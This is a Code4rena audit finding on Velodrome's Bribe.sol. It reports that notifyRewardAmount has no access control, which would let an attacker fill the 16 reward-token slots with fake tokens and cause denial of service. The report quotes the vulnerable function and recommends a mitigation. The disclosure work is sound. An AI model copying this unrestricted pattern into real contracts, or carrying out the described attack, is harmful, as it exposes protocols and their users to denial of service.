Anyone can add Bribe reward tokens and cause DoS

[code423n4]

Lines of code

https://github.com/code-423n4/2022-05-velodrome/blob/7fda97c570b758bbfa7dd6724a336c43d4041740/contracts/contracts/Bribe.sol#L42

Vulnerability details

Impact

The Bribe.notifyRewardAmount function does not have any access restriction. Anyone (an attacker) can frontrun and call this function to add arbitrary (even malicious) reward tokens up to MAX_REWARD_TOKENS = 16.

An attacker is able to frontrun and add 16 fake ERC20 token contracts. Due to the limit of MAX_REWARD_TOKENS, no more reward tokens can be added. Any attempt to add a new token will revert.

This will prevent adding the proper reward tokens due to DoS when calling the Bribe.notifyRewardAmount and results in DoS when calling the Gauge.claimFees function.

Proof of Concept

Bribe.sol#L42

function notifyRewardAmount(address token, uint amount) external lock { // @audit-info no access restriction
    require(amount > 0);
    if (!isReward[token]) {
      require(rewards.length < MAX_REWARD_TOKENS, "too many rewards tokens");
    }
    // bribes kick in at the start of next bribe period
    uint adjustedTstamp = getEpochStart(block.timestamp);
    uint epochRewards = tokenRewardsPerEpoch[token][adjustedTstamp];

    _safeTransferFrom(token, msg.sender, address(this), amount);
    tokenRewardsPerEpoch[token][adjustedTstamp] = epochRewards + amount;

    if (!isReward[token]) {
        isReward[token] = true;
        rewards.push(token);
        IGauge(gauge).addBribeRewardToken(token);
    }

    emit NotifyReward(msg.sender, token, adjustedTstamp, amount);
}

Tools Used

Manual review

Recommended mitigation steps

Consider adding access restriction to the Bribe.notifyRewardAmount function to prevent malicious actors from calling the function or add a whitelist of possible reward tokens.

[pooltypes]

Duplicate of #182

[GalloDaSballo]

Dup of #182